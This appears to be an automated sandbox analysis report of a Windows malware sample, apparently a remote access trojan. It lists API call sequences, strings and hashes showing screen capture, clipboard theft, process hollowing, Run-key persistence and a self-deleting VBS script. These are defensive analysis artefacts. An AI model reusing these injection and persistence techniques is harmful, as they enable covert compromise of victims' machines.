                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorInfoLastLocale$_free$_abort
                        • String ID:
                        • API String ID: 2829624132-0
                        • Opcode ID: 5d155598132bf3b03d9715496123f76655355fd2299683488a64446915391091
                        • Instruction ID: 12c224c4da0c85949021a4ccaa6d586ab513ef91610cb16151a2099a543b2454
                        • Opcode Fuzzy Hash: 5d155598132bf3b03d9715496123f76655355fd2299683488a64446915391091
                        • Instruction Fuzzy Hash: 49617D71600207ABEB289F25CC82B7B77A8EF14314F1041BBED06C6685EB78D949DB58
                        APIs
                        • IsDebuggerPresent.KERNEL32 ref: 004399A4
                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004399AE
                        • UnhandledExceptionFilter.KERNEL32(?), ref: 004399BB
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                        • String ID:
                        • API String ID: 3906539128-0
                        • Opcode ID: a2edd11b745fd0db19ae8b75a4dca2fd63e5a3b0d4ecfa6da1b026d4ab375051
                        • Instruction ID: 77e6618fa9d19f9c50586940e2a7469f5a9d54f298177c93e0bbf68cc30459b4
                        • Opcode Fuzzy Hash: a2edd11b745fd0db19ae8b75a4dca2fd63e5a3b0d4ecfa6da1b026d4ab375051
                        • Instruction Fuzzy Hash: 1D31D67591122C9BCB21DF65D9897CDB7B8BF08310F5051EAE40CA72A1E7749F858F48
                        APIs
                        • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00431274,00000034,?,?,00000000), ref: 004315FE
                        • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00431307,00000000,?,00000000), ref: 00431614
                        • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00431307,00000000,?,00000000,0041C006), ref: 00431626
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Crypt$Context$AcquireRandomRelease
                        • String ID:
                        • API String ID: 1815803762-0
                        • Opcode ID: 490f37dff30391dd88b2b348f1e17f82ee14bc365aa64bdd7ac48a14519942bc
                        • Instruction ID: e2f248fbd61bea3c509e9dcbc4a9d000159a3c4e1760f154dd59208f6820a057
                        • Opcode Fuzzy Hash: 490f37dff30391dd88b2b348f1e17f82ee14bc365aa64bdd7ac48a14519942bc
                        • Instruction Fuzzy Hash: FDE0923130C310BBEB304F51AC09F172A55EB8DB72FA5063AF112E50F4D6518801855C
                        APIs
                        • OpenClipboard.USER32(00000000), ref: 0040A65D
                        • GetClipboardData.USER32(0000000D), ref: 0040A669
                        • CloseClipboard.USER32 ref: 0040A671
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Clipboard$CloseDataOpen
                        • String ID:
                        • API String ID: 2058664381-0
                        • Opcode ID: edb8c36ac275bb67b795d66d8e1b797ea5e31e94c4ba3ac6c333071066a6c16d
                        • Instruction ID: 184f8b84181a4a50bd43ef3289a1c1a9f5b779335cc527adffbe090e77bee848
                        • Opcode Fuzzy Hash: edb8c36ac275bb67b795d66d8e1b797ea5e31e94c4ba3ac6c333071066a6c16d
                        • Instruction Fuzzy Hash: 6CE08C3064432097D2206F60EC08B8A66649B50B12F064A7AB849AB2D1DA75DC208AAE
                        APIs
                        • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 004329F3
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: FeaturePresentProcessor
                        • String ID:
                        • API String ID: 2325560087-3916222277
                        • Opcode ID: 6bf946e24e0cf3f7143bf6f7c2898541fb51292b7eeb3b4358a3a41aa26ebfb9
                        • Instruction ID: 4a1c44cf8a386737ece403ae0cfd22a47b20ce31fd9c2d8f3958115f99bf9d9d
                        • Opcode Fuzzy Hash: 6bf946e24e0cf3f7143bf6f7c2898541fb51292b7eeb3b4358a3a41aa26ebfb9
                        • Instruction Fuzzy Hash: E4514A719002099BDB24CFAAD98579ABBF4FF48314F14846BD815EB350E3B9A910CFA5
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: .
                        • API String ID: 0-248832578
                        • Opcode ID: 0742d3138d3954d6b0adc7bce21f8647b4e5777487e1ab8e88fa8e0c5db588f4
                        • Instruction ID: 24926096c943187a016d953fe808ce2acf1242cb654f72e39a34338bfc4b4f1c
                        • Opcode Fuzzy Hash: 0742d3138d3954d6b0adc7bce21f8647b4e5777487e1ab8e88fa8e0c5db588f4
                        • Instruction Fuzzy Hash: 0E3108719002486FEB248E79CC84EEB7BBDDB45304F14419EF858D7251EB34EE418B94
                        APIs
                        • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004419DC,?,00000004), ref: 00445E6F
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: InfoLocale
                        • String ID: GetLocaleInfoEx
                        • API String ID: 2299586839-2904428671
                        • Opcode ID: 020099d0525865bb6834e28ad9152f433c6e4676045ed3ecc95ad7b7c68cac6a
                        • Instruction ID: a9bb3d2992a9d1fe8e60343c55b6d981a628f421e7cf107d295b861f9edee2c3
                        • Opcode Fuzzy Hash: 020099d0525865bb6834e28ad9152f433c6e4676045ed3ecc95ad7b7c68cac6a
                        • Instruction Fuzzy Hash: 6DF0F631600708BBDF016F619C05F6E7B51EB14721F10401BFC051A253CA758D109A9D
                        APIs
                        • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 004068E8
                        • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 004069B0
                          • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileFind$FirstNextsend
                        • String ID:
                        • API String ID: 4113138495-0
                        • Opcode ID: e3ef31e205124b2d37ce34f80ed01c56440b36d419931c260197812f3169fbb8
                        • Instruction ID: f886cb8170a1cbefaa312452e39d18d6cd017e90ab843946bfd6f4b2f28fefe7
                        • Opcode Fuzzy Hash: e3ef31e205124b2d37ce34f80ed01c56440b36d419931c260197812f3169fbb8
                        • Instruction Fuzzy Hash: 9C218F711043015BC314FBA1DC96CEFB7ACAF91358F400A3EF596621E1EF389A09CA5A
                        APIs
                          • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                          • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                          • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                          • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                          • Part of subcall function 00445725: _free.LIBCMT ref: 00445784
                          • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791
                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F547
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast$_free$InfoLocale_abort
                        • String ID:
                        • API String ID: 1663032902-0
                        • Opcode ID: ad0e0b7788e936bcfdd9e0a2c8ea1aecabb77b710f5984c66624a7eb150c0fcd
                        • Instruction ID: 815750de5804ab4a8f75770bcc990d44dba9c2967eca50803adc2dd3443e40da
                        • Opcode Fuzzy Hash: ad0e0b7788e936bcfdd9e0a2c8ea1aecabb77b710f5984c66624a7eb150c0fcd
                        • Instruction Fuzzy Hash: 6421B372901206BBEF249F26DC45A7A73A8EB04315F10017BFD01C6242EB78AD59CB59
                        APIs
                          • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                          • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                          • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                          • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                        • EnumSystemLocalesW.KERNEL32(0044F2A3,00000001,00000000,?,00441F7E,?,0044F8D0,00000000,?,?,?), ref: 0044F1ED
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                        • String ID:
                        • API String ID: 1084509184-0
                        • Opcode ID: 1e67477eb4f1d9c825940ef83573ecb2aed64948dc5e5734fb002b4aa87f20f9
                        • Instruction ID: fc4c71b657a69648ba6c32e8c27400de65702582941300ca2eca7bc8fd592fd6
                        • Opcode Fuzzy Hash: 1e67477eb4f1d9c825940ef83573ecb2aed64948dc5e5734fb002b4aa87f20f9
                        • Instruction Fuzzy Hash: D811293B6007019FEB189F39D89167BBB91FF80358B14443DE94647B40D776A946C744
                        APIs
                          • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                          • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                          • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                          • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                        • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0044F4C1,00000000,00000000,?), ref: 0044F74F
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast$InfoLocale_abort_free
                        • String ID:
                        • API String ID: 2692324296-0
                        • Opcode ID: c5ca8868f81a5dafb3fdb259ff2b8ec3965b2bfb8aabdce9695f87c3ae70661f
                        • Instruction ID: e4b95bc4a5e1061338a04706472302caa06a68982d3ebb8569a44a178f9f49d5
                        • Opcode Fuzzy Hash: c5ca8868f81a5dafb3fdb259ff2b8ec3965b2bfb8aabdce9695f87c3ae70661f
                        • Instruction Fuzzy Hash: 09F02D36600516BBFB245B65DC05BBB7768EF40764F05447AEC19A3240EA7CFD05C6D4
                        APIs
                          • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                          • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                          • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                          • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                        • EnumSystemLocalesW.KERNEL32(0044F4F3,00000001,?,?,00441F7E,?,0044F894,00441F7E,?,?,?,?,?,00441F7E,?,?), ref: 0044F262
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                        • String ID:
                        • API String ID: 1084509184-0
                        • Opcode ID: d9e72da5ca64d0dbd4f9725887adba7bc59a573407832ad1990d17eaaac4c4d9
                        • Instruction ID: 7c38563944de2097393583401858843e6c2e12a799e64e453201a09b71e8bce8
                        • Opcode Fuzzy Hash: d9e72da5ca64d0dbd4f9725887adba7bc59a573407832ad1990d17eaaac4c4d9
                        • Instruction Fuzzy Hash: 44F0223A2007045FEB145F399881A7B7B94FF8036CB15447EF9458B690DAB6AC068614
                        APIs
                        • GetUserNameW.ADVAPI32(?,00000010), ref: 0041962D
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: NameUser
                        • String ID:
                        • API String ID: 2645101109-0
                        • Opcode ID: 8951ed9e5e96f4eef37346a31dc1e1cfc055faec67558bb1b1f4eabc83ab8062
                        • Instruction ID: 5ca8c18713c22ae7facf93a828c8627c995cdb1c7496207664ac88b3b4335c79
                        • Opcode Fuzzy Hash: 8951ed9e5e96f4eef37346a31dc1e1cfc055faec67558bb1b1f4eabc83ab8062
                        • Instruction Fuzzy Hash: 7C01FF7290011CABCB04EBD5DC45EDEB7BCEF44319F10016AB505B61A5EEB46A89CB98
                        APIs
                          • Part of subcall function 00442D9A: EnterCriticalSection.KERNEL32(?,?,004404DB,00000000,0046B4D8,0000000C,00440496,?,?,?,00443038,?,?,004457DA,00000001,00000364), ref: 00442DA9
                        • EnumSystemLocalesW.KERNEL32(004458CE,00000001,0046B680,0000000C), ref: 0044594C
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalEnterEnumLocalesSectionSystem
                        • String ID:
                        • API String ID: 1272433827-0
                        • Opcode ID: 9f071f7aa8f2d5cfdb4dd86670e259d2fa7dae68b4529c3cbc217272811744e5
                        • Instruction ID: 57fcd2d1ba6fdacad71b84952267562ddc6b8062f8818d57533dd41bf3368d71
                        • Opcode Fuzzy Hash: 9f071f7aa8f2d5cfdb4dd86670e259d2fa7dae68b4529c3cbc217272811744e5
                        • Instruction Fuzzy Hash: CFF03C72A10700EFEB00EF69D846B5D77F0EB08325F10402AF400DB2A2DAB989448B5E
                        APIs
                          • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                          • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                          • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                          • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                        • EnumSystemLocalesW.KERNEL32(0044F087,00000001,?,?,?,0044F8F2,00441F7E,?,?,?,?,?,00441F7E,?,?,?), ref: 0044F167
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                        • String ID:
                        • API String ID: 1084509184-0
                        • Opcode ID: 27fc750af04bae75093f47f6c8e3f33632e5f31a47d704513601fd173c54c35f
                        • Instruction ID: 407cbbfb1d6a14fdc0c4ba4a8479f65f1c0a46e2fba7f2f7bc53bc9e3406d240
                        • Opcode Fuzzy Hash: 27fc750af04bae75093f47f6c8e3f33632e5f31a47d704513601fd173c54c35f
                        • Instruction Fuzzy Hash: 22F05C3930020597DB049F35D845A7ABFA0EFC1754F060069EA058B651C6359C46C754
                        APIs
                        • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00413F34,00471E78,00472910,00471E78,00000000,00471E78,00000000,00471E78,3.8.0 Pro), ref: 0040E2CF
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: InfoLocale
                        • String ID:
                        • API String ID: 2299586839-0
                        • Opcode ID: 856777f14b9a4662401ba442cf494b6ebb80c668ca2d98772b8c18b49fbcc60a
                        • Instruction ID: e43a985d938ffd5d313bbeec62feab64fa47c80c67ee5e1720aa7bcbe65aeca7
                        • Opcode Fuzzy Hash: 856777f14b9a4662401ba442cf494b6ebb80c668ca2d98772b8c18b49fbcc60a
                        • Instruction Fuzzy Hash: 65D05E30B4421C7BEA10D6859C0AEAA7B9CD701B62F0001A6BA08D72D0E9E1AE0487E6
                        APIs
                        • SetUnhandledExceptionFilter.KERNEL32(Function_00032908,0043262F), ref: 00432901
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExceptionFilterUnhandled
                        • String ID:
                        • API String ID: 3192549508-0
                        • Opcode ID: 937b0859e2ecbaa4ed0ef4ac8f36e04938c9481000da7c0a06be09f57d080333
                        • Instruction ID: aee9a4537fe14d989eba5338f3e0e07ed20d0bd3150f914eab3e23255f36ef43
                        • Opcode Fuzzy Hash: 937b0859e2ecbaa4ed0ef4ac8f36e04938c9481000da7c0a06be09f57d080333
                        • Instruction Fuzzy Hash:
                        APIs
                        • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00416E98
                        • CreateCompatibleDC.GDI32(00000000), ref: 00416EA5
                          • Part of subcall function 004172DF: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 0041730F
                        • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00416F1B
                        • DeleteDC.GDI32(00000000), ref: 00416F32
                        • DeleteDC.GDI32(00000000), ref: 00416F35
                        • DeleteObject.GDI32(00000000), ref: 00416F38
                        • SelectObject.GDI32(00000000,00000000), ref: 00416F59
                        • DeleteDC.GDI32(00000000), ref: 00416F6A
                        • DeleteDC.GDI32(00000000), ref: 00416F6D
                        • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00416F91
                        • GetIconInfo.USER32(?,?), ref: 00416FC5
                        • DeleteObject.GDI32(?), ref: 00416FF4
                        • DeleteObject.GDI32(?), ref: 00417001
                        • DrawIcon.USER32(00000000,?,?,?), ref: 0041700E
                        • GetObjectA.GDI32(00000000,00000018,?), ref: 00417026
                        • LocalAlloc.KERNEL32(00000040,00000001), ref: 00417095
                        • GlobalAlloc.KERNEL32(00000000,?), ref: 00417104
                        • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00417128
                        • DeleteDC.GDI32(?), ref: 0041713C
                        • DeleteDC.GDI32(00000000), ref: 0041713F
                        • DeleteObject.GDI32(00000000), ref: 00417142
                        • GlobalFree.KERNEL32(?), ref: 0041714D
                        • DeleteObject.GDI32(00000000), ref: 00417201
                        • GlobalFree.KERNEL32(?), ref: 00417208
                        • DeleteDC.GDI32(?), ref: 00417218
                        • DeleteDC.GDI32(00000000), ref: 00417223
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                        • String ID: DISPLAY
                        • API String ID: 479521175-865373369
                        • Opcode ID: 1a3d4f3de887f4170ad339b02c00c27acc1d1d199adb59c50c414d62b5943ebe
                        • Instruction ID: 4ba325f74191387ade15767708145f982ef5b1c7ca4df498548f130554e7309d
                        • Opcode Fuzzy Hash: 1a3d4f3de887f4170ad339b02c00c27acc1d1d199adb59c50c414d62b5943ebe
                        • Instruction Fuzzy Hash: 6FB16A315083009FD720DF24DC44BABBBE9EF88755F41482EF98993291DB38E945CB5A
                        APIs
                        • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00416474
                        • GetProcAddress.KERNEL32(00000000), ref: 00416477
                        • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00416488
                        • GetProcAddress.KERNEL32(00000000), ref: 0041648B
                        • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041649C
                        • GetProcAddress.KERNEL32(00000000), ref: 0041649F
                        • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004164B0
                        • GetProcAddress.KERNEL32(00000000), ref: 004164B3
                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00416555
                        • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041656D
                        • GetThreadContext.KERNEL32(?,00000000), ref: 00416583
                        • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004165A9
                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041662B
                        • TerminateProcess.KERNEL32(?,00000000), ref: 0041663F
                        • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041667F
                        • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00416749
                        • SetThreadContext.KERNEL32(?,00000000), ref: 00416766
                        • ResumeThread.KERNEL32(?), ref: 00416773
                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041678A
                        • GetCurrentProcess.KERNEL32(?), ref: 00416795
                        • TerminateProcess.KERNEL32(?,00000000), ref: 004167B0
                        • GetLastError.KERNEL32 ref: 004167B8
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                        • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                        • API String ID: 4188446516-3035715614
                        • Opcode ID: 5b7e1e0f0ab70bb274c8e1cba5061de31cdd1b1bc4dd29beedf5b9f83fbb8038
                        • Instruction ID: 94204e0ceb90eb3d518cc699b6b418d02f123724867831e7a48fec904b930286
                        • Opcode Fuzzy Hash: 5b7e1e0f0ab70bb274c8e1cba5061de31cdd1b1bc4dd29beedf5b9f83fbb8038
                        • Instruction Fuzzy Hash: 9CA18E71604300AFDB109F64DC85F6B7BE8FB48749F00092AF695D62A1E7B8EC44CB5A
                        APIs
                          • Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,?,0040C3C8), ref: 004112C5
                          • Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF,?,0040C3C8), ref: 004112D8
                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C0D6
                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C0E9
                        • SetFileAttributesW.KERNEL32(?,00000080), ref: 0040C102
                        • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040C132
                          • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(00409305,00000000,004721E8,0040BC76,?,00472200,pth_unenc,004721E8), ref: 0040A801
                          • Part of subcall function 0040A7F2: UnhookWindowsHookEx.USER32(?), ref: 0040A811
                          • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(004092EF,00000000,?,00472200,pth_unenc,004721E8), ref: 0040A823
                          • Part of subcall function 0041A17B: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041A29A,00000000,00000000,00000000), ref: 0041A1BA
                        • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040C37D
                        • ExitProcess.KERNEL32 ref: 0040C389
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                        • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$H"G$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$t<F$wend$while fso.FileExists("
                        • API String ID: 1861856835-1953526029
                        • Opcode ID: 10d0c7ff4f1d806eef4ddcd080fba36a068473baf966d624ed17e78b73616814
                        • Instruction ID: 20f5f97700cb48a3d0b4a42ff25d793d854bdbfc6fb2dd54058f707cc559a17d
                        • Opcode Fuzzy Hash: 10d0c7ff4f1d806eef4ddcd080fba36a068473baf966d624ed17e78b73616814
                        • Instruction Fuzzy Hash: 579180712042405AC314FB62D8929EF77E99F90708F50453FB586B31E3EE789E49C69E
                        APIs
                        • CreateMutexA.KERNEL32(00000000,00000001,00000000,00472200,00471FFC,00000000), ref: 00410EF9
                        • ExitProcess.KERNEL32(00000000), ref: 00410F05
                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00410F7F
                        • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00410F8E
                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00410F99
                        • CloseHandle.KERNEL32(00000000), ref: 00410FA0
                        • GetCurrentProcessId.KERNEL32 ref: 00410FA6
                        • PathFileExistsW.SHLWAPI(?), ref: 00410FD7
                        • GetTempPathW.KERNEL32(00000104,?), ref: 0041103A
                        • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 00411054
                        • lstrcatW.KERNEL32(?,.exe), ref: 00411066
                          • Part of subcall function 0041A17B: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041A29A,00000000,00000000,00000000), ref: 0041A1BA
                        • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 004110A6
                        • Sleep.KERNEL32(000001F4), ref: 004110E7
                        • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004110FC
                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00411107
                        • CloseHandle.KERNEL32(00000000), ref: 0041110E
                        • GetCurrentProcessId.KERNEL32 ref: 00411114
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                        • String ID: (#G$.exe$H"G$WDH$exepath$open$temp_
